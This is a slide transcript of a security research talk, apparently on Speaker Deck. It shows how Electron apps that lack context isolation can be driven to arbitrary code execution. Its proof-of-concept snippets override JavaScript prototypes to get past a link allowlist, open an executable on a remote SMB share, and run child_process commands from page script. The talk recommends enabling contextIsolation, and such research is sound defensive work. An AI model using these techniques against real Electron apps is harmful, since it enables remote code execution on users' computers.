Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)

Masato Kinugawa
August 18, 2018
Research
9
19k

Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)

ベルリンで開催されたCure53のイベント、CureConの資料です。

Masato Kinugawa

August 18, 2018
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
5.9k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
84k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
11k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
19k
ブラウザのUIのバグを探す / Secusoba PopUnder
masatokinugawa
2
1.7k
攻撃者視点で見る Service Worker / PWA Study SW
masatokinugawa
20
24k
USAGE OF XSS FILTER
masatokinugawa
4
2.5k
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
masatokinugawa
7
2.6k
XSS Attacks through PATH
masatokinugawa
8
16k

Other Decks in Research

See All in Research
Analysis and Estimation of News Article Reading Time with Multimodal Machine Learning
upura
0
130
Foundation Model and Robotics | 基盤モデルとロボティクス
mertcooking
2
2.7k
Semantic Shift Stability: Efficient Way to Detect Performance Degradation of Word Embeddings and Pre-trained Language Models
upura
0
880
単語の通時的な意味変化のモデル化
seiichiinoue
2
470
物理現象の性質を反映させたグラフニューラルネットワークによる偏微分方程式の学習
yellowshippo
2
770
傾向スコアのモデルに含める共変量選択のアプローチ
tomoshige_n
1
900
【IR Reading2022秋】 CPFair: Personalized Consumer and Producer Fairness Re-ranking for Recommender Systems
yamato0811
1
120
AWS CDKでもMacを 管理したい
moba
0
120
[CFML勉強会#7] EconMLに実装されている異質処置効果の推定手法の紹介・再考
fullflu
0
520
2023 東工大 情報通信系 研究室紹介 (すずかけ台) / [email protected], Tokyo Tech (Suzukakedai Campus) 2023
icttitech
0
2k
第21回チャンピオンズミーティング・カプリコーン杯ラウンド1集計 / Umamusume Capricorn 2023 Round1
kitachan_black
0
850
熱を用いた2次元マーカの検討 / UBI77
yumulab
0
320

Featured

See All Featured
Building Better People: How to give real-time feedback that sticks.
wjessup
346
17k
Infographics Made Easy
chrislema
236
17k
Side Projects
sachag
451
38k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
270
12k
How to name files
jennybc
48
76k
Music & Morning Musume
bryan
37
4.7k
The Invisible Customer
myddelton
113
12k
The Power of CSS Pseudo Elements
geoffreycrofte
53
4.4k
Designing Experiences People Love
moore
130
22k
Fashionably flexible responsive web design (full day workshop)
malarkey
396
64k
Three Pipe Problems
jasonvnalue
89
9k
Keith and Marios Guide to Fast Websites
keithpitt
407
21k

Transcript

  1. Masato Kinugawa
    CureCon 08/2018

    View Slide




  2. View Slide





  3. View Slide

  4. View Slide

  5. 1

    View Slide



  6. View Slide

  7. https://electronjs.org/#apps

    View Slide




  8. View Slide

  9. main.js
    const {BrowserWindow} = require('electron');
    let win = new BrowserWindow();
    //Open Renderer Process
    win.loadURL(`file://${__dirname}/index.html`);

    View Slide

  10. index.html



    TEST


    Hello Electron!
    <br/>body{<br/>background:url('island.png')<br/>}<br/>


    View Slide



  11. new BrowserWindow({
    webPreferences:{
    "FEATURE_NAME": true
    }
    });

    View Slide





  12. View Slide

  13. let win = new BrowserWindow({
    webPreferences:{
    nodeIntegration: true
    }
    });
    win.loadURL(`[...] index.html`);
    main.js

    <br/>require('child_process')<br/>.exec('calc')<br/>

    index.html

    View Slide



  14. new BrowserWindow({
    webPreferences:{
    nodeIntegration: false,
    preload: path.join(__dirname,'preload.js')
    }
    });
    main.js

    View Slide

  15. /* preload.js */
    typeof require === 'function';//true
    window.runCalc = function(){
    require('child_process').exec('calc')
    };


    <br/>typeof require === 'undefined';//true<br/>runCalc();<br/>

    Node

    View Slide




  16. View Slide

  17. new BrowserWindow({
    webPreferences:{
    nodeIntegration: false,
    contextIsolation: true,
    preload: path.join(__dirname,'preload.js')
    }
    });

    View Slide

  18. 2

    View Slide




  19. View Slide



  20. View Slide

  21. https://github.com/electron/i18n/blob/81f707c69562cb91fe7c5a98270827a28b93fd5f/content/ja-
    JP/docs/tutorial/security.md#3-リモートコンテンツでコンテキストイソレーションを有効にする

    View Slide

  22. /* Content Script */
    window.abc = 123;
    /* https://example.com */
    alert(window.abc)//undefined
    Isolated
    World

    View Slide

  23. /* preload.js */
    window.abc = 123;
    /* index.html */
    alert(window.abc)//123
    Isolated
    World

    View Slide

  24. /* preload.js */
    window.abc = 123;
    /* index.html */
    alert(window.abc)//undefined
    Isolated
    World

    View Slide

  25. /* preload.js */
    onmessage=function(e){
    if(e.data==='runCalc'){
    require('child_process').exec('calc')
    }
    }
    /* index.html */
    postMessage('runCalc','*')
    Isolated
    World

    View Slide



  26. View Slide

  27. 3

    View Slide

  28. View Slide

  29. View Slide

  30. /* preload.js */
    const {shell} = require('electron');
    const SAFE_PROTOCOLS = ["http:", "https:"];
    document.addEventListener('click', (e) => {
    if (e.target.nodeName === 'A') {
    var link = e.target;
    if (SAFE_PROTOCOLS.indexOf(link.protocol) !== -1) {
    shell.openExternal(link.href);
    } else {
    alert('This link is not allowed');
    }
    e.preventDefault();
    }
    }, false);
    http(s):

    View Slide

  31. const {shell} = require('electron');
    /* */
    shell.openExternal('https://example.com/');
    /* */
    shell.openExternal('mailto:[email protected]');
    /* */
    shell.openExternal('file:///C:/windows/system32/calc.exe');

    View Slide

  32. /* preload.js */
    const {shell} = require('electron');
    const SAFE_PROTOCOLS = ["http:", "https:"];
    document.addEventListener('click', (e) => {
    if (e.target.nodeName === 'A') {
    var link = e.target;
    if (SAFE_PROTOCOLS.indexOf(link.protocol) !== -1) {
    shell.openExternal(link.href);
    } else {
    alert('This link is not allowed');
    }
    e.preventDefault();
    }
    }, false);

    View Slide

  33. <br/>Array.prototype.indexOf = function(){<br/>return 1337;<br/>}<br/>

    View Slide

  34. if (SAFE_PROTOCOLS.indexOf(link.protocol) !== -1) {
    shell.openExternal(link.href);
    }

    View Slide

  35. if (1337 !== -1) {
    shell.openExternal(link.href);
    }

    View Slide

  36. <br/>Array.prototype.indexOf=function(){<br/>return 1337;<br/>}<br/>
    CLICK
    Click
    if (1337 !== -1) {
    shell.openExternal(link.href);
    }

    View Slide



  37. View Slide

  38. const { shell } = require('electron');
    shell.openExternal("file://[REMOTE_SMB_SERVER]/share/test.exe");

    View Slide

  39. const { shell } = require('electron');
    shell.openExternal("file://[REMOTE_SMB_SERVER]/share/test.SettingContent-ms");

    The Tale of SettingContent-ms Files – Posts By SpecterOps Team Members(Matt Nelson)
    https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

    View Slide




  40. InsertScript: DLL Hijacking via URL files (Alex Inführ)
    https://insert-script.blogspot.com/2018/05/dll-hijacking-via-
    url-files.html

    View Slide




  41. View Slide

  42. // Clean cache on quit.
    process.on('exit', function () {
    for (let p in cachedArchives) {
    if (!hasProp.call(cachedArchives, p)) continue
    cachedArchives[p].destroy()
    }
    })
    https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib
    /common/asar.js#L30-L36

    View Slide

  43. EventEmitter.prototype.emit = function emit(type) {
    [...]
    handler = events[type];
    [...]
    var isFn = typeof handler === 'function';
    len = arguments.length;
    switch (len) {
    // fast cases
    case 1:
    emitNone(handler, isFn, this);
    break;
    case 2:
    [...]
    }
    };
    https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/lib/events.js#L156-L231

    View Slide

  44. function emitNone(handler, isFn, self) {
    if (isFn)
    handler.call(self);
    else {
    var len = handler.length;
    var listeners = arrayClone(handler, len);
    for (var i = 0; i < len; ++i)
    listeners[i].call(self);
    }
    }
    https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/lib/events.js#L104-L113

    View Slide

  45. function emitNone(handler, isFn, self) {
    if (isFn)
    handler.call(self);
    else {
    var len = handler.length;
    var listeners = arrayClone(handler, len);
    for (var i = 0; i < len; ++i)
    listeners[i].call(self);
    }
    }

    View Slide

  46. process.mainModule.require

    View Slide

  47. function emitNone(handler, isFn, self) {
    if (isFn)
    handler.call(self);
    else {
    var len = handler.length;
    var listeners = arrayClone(handler, len);
    for (var i = 0; i < len; ++i)
    listeners[i].call(self);
    }
    }

    View Slide

  48. <br/>Function.prototype.call=function(process){<br/>process.mainModule.require('child_process').execSync('calc');<br/>}<br/>location.reload();//<br/>

    View Slide

  49. function emitNone(handler, isFn, self) {
    if (isFn)
    handler.call(self);
    else {
    var len = handler.length;
    var listeners = arrayClone(handler, len);
    for (var i = 0; i < len; ++i)
    listeners[i].call(self);
    }
    }
    Function.prototype.call=function(process){
    process.mainModule.require('child_process').execSync('calc');
    }

    View Slide

  50. • XSS

    • MitM
    JS
    contextIsolation RCE

    View Slide



  51. View Slide



  52. View Slide



  53. /* preload.js */
    document.addEventListener('click', (e) => {
    /*
    }, false);

    View Slide



  54. new BrowserWindow({
    webPreferences:{
    nodeIntegration: false,
    contextIsolation: true,
    preload: path.join(__dirname,'preload.js')
    }
    });
    IMPORTANT!

    View Slide

  55. View Slide